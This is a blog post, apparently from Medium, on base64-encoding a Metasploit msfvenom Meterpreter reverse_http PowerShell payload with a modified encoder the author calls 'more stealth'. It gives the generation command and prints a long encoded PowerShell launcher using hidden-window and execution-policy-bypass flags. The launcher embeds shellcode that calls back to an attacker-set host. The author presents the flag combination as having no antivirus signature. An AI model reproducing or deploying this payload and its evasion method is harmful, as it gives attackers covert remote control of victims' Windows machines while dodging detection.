LeoX

May 1

2 min read

Encode Msfvenom PowerShell payload with base64

In this story I will describe you how you can encode msfvenom powershell payload with base64. By default msfvenom have powershell base64 encoder, but this one actually encode commands you pass to cmd.exe, and not PowerShell scripts. First download new encoder, which I created and add it in metasploit folder. This encoder was not compiled from scratch by me. I just modified encoder by Didier Stevens to my needs, and make it more stealth.

Here is the link for encoder created in ruby. Just download it and add it to metasploit folder. In Kali Linux or Parrot OS this folder is located in /usr/share/metasploit-framework/modules/encoders. To confirm that the encoder is on the right place, check it with the next command.

msfvenom --list encoders

Here is example how we can create powershell base64 encoded payload:

msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.1.133 LPORT=8080 --format psh | msfvenom --payload - --platform win --arch x86 --encoder base64 NOEXIT SYSWOW64

and you will get final output something like this…

c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -W Hidden -nop -ep bypass -NoExit -E JABsAEMATQByAFYASwBPAEoAIAA9ACAAQAAiAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsADQAKACIAQAANAAoADQAKACQAVgBtAEwAdgBqAEcAQwBCAG4ASQBMAGIAQgBRACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbABDAE0AcgBWAEsATwBKACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQANAAoADQAKAFsAQgB5AHQAZQBbAF0AXQAgACQAaQB1AE0AcQB1AE0AagBtAGsAZAByAHkAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAALAAwAHgAMAAsADAAeAAwACwAMAB4ADYAMAAsADAAeAA4ADkALAAwAHgAZQA1ACwAMAB4ADMAMQAsADAAeABkADIALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAYwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEANAAsADAAeAA4AGIALAAwAHgANwAyACwAMAB4ADIAOAAsADAAeABmACwAMAB4AGIANwAsADAAeAA0AGEALAAwAHgAMgA2ACwAMAB4ADMAMQAsADAAeABmAGYALAAwAHgAMwAxACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgAMwBjACwAMAB4ADYAMQAsADAAeAA3AGMALAAwAHgAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAZAAsADAAeAAxACwAMAB4AGMANwAsADAAeAA0ADkALAAwAHgANwA1ACwAMAB4AGUAZgAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQAwACwAMAB4ADgAYgAsADAAeAA0ADIALAAwAHgAMwBjACwAMAB4ADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAxACwAMAB4AGQAMAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAAxACwAMAB4AGQAMwAsADAAeAA1ADAALAAwAHgAOAA1ACwAMAB4AGMAOQAsADAAeAA3ADQALAAwAHgAMwBjACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAxACwAMAB4AGQANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeABkACwAMAB4AGEAYwAsADAAeAAxACwAMAB4AGMANwAsADAAeAAzADgALAAwAHgAZQAwACwAMAB4ADcANQAsADAAeABmADQALAAwAHgAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADEALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAA4AGIALAAwAHgAYwAsADAAeAA0AGIALAAwAHgAOABiACwAMAB4ADUAOAAsADAAeAAxAGMALAAwAHgAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADQALAAwAHgAOABiACwAMAB4ADEALAAwAHgAZAAwACwAMAB4ADgAOQAsADAAeAA0ADQALAAwAHgAMgA0ACwAMAB4ADIANAAsADAAeAA1AGIALAAwAHgANQBiACwAMAB4ADYAMQAsADAAeAA1ADkALAAwAHgANQBhACwAMAB4ADUAMQAsADAAeABmAGYALAAwAHgAZQAwACwAMAB4ADUAOAAsADAAeAA1AGYALAAwAHgANQBhACwAMAB4ADgAYgAsADAAeAAxADIALAAwAHgAZQA5ACwAMAB4ADgAMAAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAA1AGQALAAwAHgANgA4ACwAMAB4ADYAZQAsADAAeAA2ADUALAAwAHgANwA0ACwAMAB4ADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAAzADEALAAwAHgAZABiACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgAZQA4ACwAMAB4ADQAZgAsADAAeAAwACwAMAB4ADAALAAwAHgAMAAsADAAeAA0AGQALAAwAHgANgBmACwAMAB4ADcAYQAsADAAeAA2ADkALAAwAHgANgBjACwAMAB4ADYAYwAsADAAeAA2ADEALAAwAHgAMgBmACwAMAB4ADMANQAsADAAeAAyAGUALAAwAHgAMwAwACwAMAB4ADIAMAAsADAAeAAyADgALAAwAHgANQA3ACwAMAB4ADYAOQAsADAAeAA2AGUALAAwAHgANgA0ACwAMAB4ADYAZgAsADAAeAA3ADcALAAwAHgANwAzACwAMAB4ADIAMAAsADAAeAA0AGUALAAwAHgANQA0ACwAMAB4ADIAMAAsADAAeAAzADEALAAwAHgAMwAwACwAMAB4ADIAZQAsADAAeAAzADAALAAwAHgAMwBiACwAMAB4ADIAMAAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4ADYAZQAsADAAeAAzADYALAAwAHgAMwA0ACwAMAB4ADMAYgAsADAAeAAyADAALAAwAHgANwA4ACwAMAB4ADMANgAsADAAeAAzADQALAAwAHgAMwBiACwAMAB4ADIAMAAsADAAeAA3ADIALAAwAHgANwA2ACwAMAB4ADMAYQAsADAAeAAzADkALAAwAHgAMwA3ACwAMAB4ADIAZQAsADAAeAAzADAALAAwAHgAMgA5ACwAMAB4ADIAMAAsADAAeAA0ADcALAAwAHgANgA1ACwAMAB4ADYAMwAsADAAeAA2AGIALAAwAHgANgBmACwAMAB4ADIAZgAsADAAeAAzADIALAAwAHgAMwAwACwAMAB4ADMAMQAsADAAeAAzADAALAAwAHgAMwAwACwAMAB4ADMAMQAsADAAeAAzADAALAAwAHgAMwAxACwAMAB4ADIAMAAsADAAeAA0ADYALAAwAHgANgA5ACwAMAB4ADcAMgAsADAAeAA2ADUALAAwAHgANgA2ACwAMAB4ADYAZgAsADAAeAA3ADgALAAwAHgAMgBmACwAMAB4ADMAOQAsADAAeAAzADcALAAwAHgAMgBlACwAMAB4ADMAMAAsADAAeAAwACwAMAB4ADYAOAAsADAAeAAzAGEALAAwAHgANQA2ACwAMAB4ADcAOQAsADAAeABhADcALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADYAYQAsADAAeAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADkAMAAsADAAeAAxAGYALAAwAHgAMAAsADAAeAAwACwAMAB4AGUAOAAsADAAeAA1AGIALAAwAHgAMQAsADAAeAAwACwAMAB4ADAALAAwAHgAMgBmACwAMAB4ADcANAAsADAAeAAzADUALAAwAHgANQA2ACwAMAB4ADUANwAsADAAeAAzADAALAAwAHgANgA1ACwAMAB4ADYANwAsADAAeAAyAGQALAAwAHgANAA2ACwAMAB4ADMAMQAsADAAeAA3ADkALAAwAHgANQAzACwAMAB4ADUAOAAsADAAeAA0AGEALAAwAHgANABlACwAMAB4ADYANAAsADAAeAAzADgALAAwAHgANAA0ACwAMAB4ADQAYQAsADAAeAA2AGYALAAwAHgANABhACwAMAB4ADUAMQAsADAAeAA3ADEALAAwAHgANwA1ACwAMAB4ADQAOQAsADAAeAA0ADMALAAwAHgANQA2ACwAMAB4ADIAZAAsADAAeAAzADAALAAwAHgANQAzACwAMAB4ADQAOAAsADAAeAA2AGEALAAwAHgANABmACwAMAB4ADMAMAAsADAAeAA2ADMALAAwAHgANAA2ACwAMAB4ADUANgAsADAAeAA1ADkALAAwAHgANwAwACwAMAB4ADYAZgAsADAAeAA2AGIALAAwAHgANwA1ACwAMAB4ADcAYQAsADAAeAA1ADQALAAwAHgANQBmACwAMAB4ADUANAAsADAAeAA0ADEALAAwAHgANABlACwAMAB4ADMANwAsADAAeAAzADIALAAwAHgANgBlACwAMAB4ADYAYwAsADAAeAAzADYALAAwAHgAMwA1ACwAMAB4ADUAMAAsADAAeAA1ADgALAAwAHgANQAzACwAMAB4ADUAMAAsADAAeAA2ADQALAAwAHgAMwA4ACwAMAB4ADYAMQAsADAAeAA0ADMALAAwAHgANgA5ACwAMAB4ADUAMQAsADAAeAA0ADcALAAwAHgANQBmACwAMAB4ADMAMwAsADAAeAA3ADMALAAwAHgANQAyACwAMAB4ADYAOAAsADAAeAA1ADMALAAwAHgAMwAxACwAMAB4ADQAZQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQANgAsADAAeAA0AGQALAAwAHgANQA1ACwAMAB4ADIAZAAsADAAeAA2ADgALAAwAHgANABlACwAMAB4ADUANQAsADAAeAA0ADYALAAwAHgANwA0ACwAMAB4ADYAYgAsADAAeAA2ADMALAAwAHgANgBlACwAMAB4ADQAMgAsADAAeAA2ADkALAAwAHgANgBmACwAMAB4ADYANAAsADAAeAA2AGUALAAwAHgANwAwACwAMAB4ADMANgAsADAAeAA0ADYALAAwAHgANQA4ACwAMAB4ADcAOAAsADAAeAA0ADgALAAwAHgANQAyACwAMAB4ADQAMwAsADAAeAAzADEALAAwAHgANgAxACwAMAB4ADUAMgAsADAAeAA0AGQALAAwAHgANABhACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgANgBmACwAMAB4ADUAMgAsADAAeAA1ADkALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAA0AGUALAAwAHgANwA2ACwAMAB4ADUANAAsADAAeAA2AGMALAAwAHgANwA1ACwAMAB4ADMAOAAsADAAeAA1ADYALAAwAHgANgBkACwAMAB4ADYAMgAsADAAeAA1ADAALAAwAHgANAAxACwAMAB4ADUAOAAsADAAeAA3ADAALAAwAHgANgAyACwAMAB4ADQANAAsADAAeAA2AGUALAAwAHgANwA1ACwAMAB4ADQAYgAsADAAeAA0ADYALAAwAHgAMwA1ACwAMAB4ADYANwAsADAAeAAzADEALAAwAHgANgAxACwAMAB4ADYAYQAsADAAeAA1AGEALAAwAHgANQA3ACwAMAB4ADMANQAsADAAeAA1ADcALAAwAHgANABkACwAMAB4ADQAMwAsADAAeAA3ADUALAAwAHgANgBkACwAMAB4ADMAOAAsADAAeAA1ADcALAAwAHgANAA5ACwAMAB4ADUANQAsADAAeAA2ADgALAAwAHgANQA0ACwAMAB4ADYAZAAsADAAeAAzADYALAAwAHgANAA3ACwAMAB4ADYAYQAsADAAeAA0ADgALAAwAHgAMwA5ACwAMAB4ADUAOQAsADAAeAAzADIALAAwAHgANAA1ACwAMAB4ADQAZQAsADAAeAA0ADcALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeAA0ADEALAAwAHgANQA5ACwAMAB4ADYAMgAsADAAeAA0ADcALAAwAHgANwA4ACwAMAB4ADQAYQAsADAAeAA0AGQALAAwAHgANwAxACwAMAB4ADYANgAsADAAeAA3ADQALAAwAHgANgA4ACwAMAB4ADYAYQAsADAAeAA0AGMALAAwAHgANwA5ACwAMAB4ADQANgAsADAAeAA2ADYALAAwAHgANgAyACwAMAB4ADUANAAsADAAeAA2ADgALAAwAHgANABkACwAMAB4ADYANgAsADAAeAAzADUALAAwAHgAMwAzACwAMAB4ADUANAAsADAAeAA3ADEALAAwAHgANABmACwAMAB4ADQAZAAsADAAeAA1ADIALAAwAHgANQA0ACwAMAB4ADMAMAAsADAAeAAzADUALAAwAHgAMgBkACwAMAB4ADQAZQAsADAAeAA2ADMALAAwAHgANAA3ACwAMAB4ADYANgAsADAAeAA2AGIALAAwAHgANAA2ACwAMAB4ADUAOAAsADAAeAAzADIALAAwAHgAMwA2ACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgANwBhACwAMAB4ADUAMgAsADAAeAA1ADUALAAwAHgANABlACwAMAB4ADUAMQAsADAAeAA3AGEALAAwAHgANgA2ACwAMAB4ADQAYQAsADAAeAA2ADYALAAwAHgANwA4ACwAMAB4ADMAOAAsADAAeAA1ADUALAAwAHgANgAzACwAMAB4ADcAOAAsADAAeAA0ADcALAAwAHgANAAzACwAMAB4ADAALAAwAHgANQAwACwAMAB4ADYAOAAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADkAZgAsADAAeABjADYALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA4ADkALAAwAHgAYwA2ACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMAAsADAAeAAyACwAMAB4ADYAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAYQAsADAAeAA1AGYALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUANgAsADAAeAA2ADgALAAwAHgAMgBkACwAMAB4ADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANAAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwACwAMAB4ADAALAAwAHgANgA4ACwAMAB4ADQANAAsADAAeABmADAALAAwAHgAMwA1ACwAMAB4AGUAMAAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADQAZgAsADAAeAA3ADUALAAwAHgAZQAxACwAMAB4AGUAOAAsADAAeAA0AGEALAAwAHgAMAAsADAAeAAwACwAMAB4ADAALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAsADAAeAAxADAALAAwAHgAMAAsADAAeAAwACwAMAB4ADYAOAAsADAAeAAwACwAMAB4ADAALAAwAHgANAAwACwAMAB4ADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAsADAAeAAyADAALAAwAHgAMAAsADAAeAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZgAsADAAeAA4AGIALAAwAHgANwAsADAAeAAxACwAMAB4AGMAMwAsADAAeAA4ADUALAAwAHgAYwAwACwAMAB4ADcANQAsADAAeABlADUALAAwAHgANQA4ACwAMAB4AGMAMwAsADAAeAA1AGYALAAwAHgAZQA4ACwAMAB4ADcAZgAsADAAeABmAGYALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeAAzADEALAAwAHgAMwA5ACwAMAB4ADMAMgAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMANgAsADAAeAAzADgALAAwAHgAMgBlACwAMAB4ADMAMQAsADAAeAAyAGUALAAwAHgAMwAxACwAMAB4ADMAMAAsADAAeAAzADQALAAwAHgAMAAsADAAeABiAGIALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4ADYAYQAsADAAeAAwACwAMAB4ADUAMwAsADAAeABmAGYALAAwAHgAZAA1AA0ACgANAAoADQAKACQAQgBpAGkAYwBzAG0AVABOAGsAYQAgAD0AIAAkAFYAbQBMAHYAagBHAEMAQgBuAEkATABiAEIAUQA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAWwBNAGEAdABoAF0AOgA6AE0AYQB4ACgAJABpAHUATQBxAHUATQBqAG0AawBkAHIAeQAuAEwAZQBuAGcAdABoACwAMAB4ADEAMAAwADAAKQAsADAAeAAzADAAMAAwACwAMAB4ADQAMAApAA0ACgANAAoAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAQwBvAHAAeQAoACQAaQB1AE0AcQB1AE0AagBtAGsAZAByAHkALAAwACwAJABCAGkAaQBjAHMAbQBUAE4AawBhACwAJABpAHUATQBxAHUATQBqAG0AawBkAHIAeQAuAEwAZQBuAGcAdABoACkADQAKAA0ACgAkAFYAbQBMAHYAagBHAEMAQgBuAEkATABiAE

The first part of this comamnd will create meterpreter reverse https payload in phs format. This format psh is the format to use to generate a PowerShell script that will execute the payload (formats ps1 and powershell are transform formats, they do not generate a script that executes the payload).

In second part of command --payload— indicates that the payload has to be taken from stdin and encoded with base64. I also added new options NOEXIT, which will include -W Hidden -nop -ep bypass -NoExit to the final powershell command. This is one of the powershell syntaxes combination for which I found that does not have signature in data base. The second one SYSWOW64 uses32-bit powershell.exe on 64-bit windows.

Take note that this payload windows/meterpreter/reverse_http is used here only for an example and is not undetectable. If you are interesting how to create undetectable payload you can check my another story.

--

--

--

More from LeoX

I am enthusiastic “hacker”, “programmer”, and I am in love into computer technology. This are my hobbies, and I was hooked in before hacking was even illegal.

Love podcasts or audiobooks? Learn on the go with our new app.

Try Knowable

Recommended from Medium

Jackson Reynolds

Rails Gear Pool Project

Supratip Banerjee

in

FAUN Publication

Create your first S3 bucket using AWS CDK

學習筆記

Leetcode in C DAY3-Maximum Subarray

Bene Studio

in

Bene Studio

Bene Studio Serverless Workshop — Calorie Counter App

Lars Wächter

in

Level Up Coding

Improving Minimax performance

Aakash Gnanavelu

5 Interesting commands in torch.tensor

jychp

How to bypass CloudFlare bot protection ?

Coinary

Get To Know Our Specialized Customer Support

AboutHelpTermsPrivacy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
LeoX

LeoX

I am enthusiastic “hacker”, “programmer”, and I am in love into computer technology. This are my hobbies, and I was hooked in before hacking was even illegal.

More from Medium

ked.

‘Meow’ Writeup — Hack The Box Starting Point

fatman

Rogue Raspberry Pi Exploit

K. Reddy Kiran

Metasploitable 2 - Full Walkthrough :

LeoX

in

InfoSec Write-ups

Persistent Windows 10 and 11 keylogger (keylogiq)

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Knowable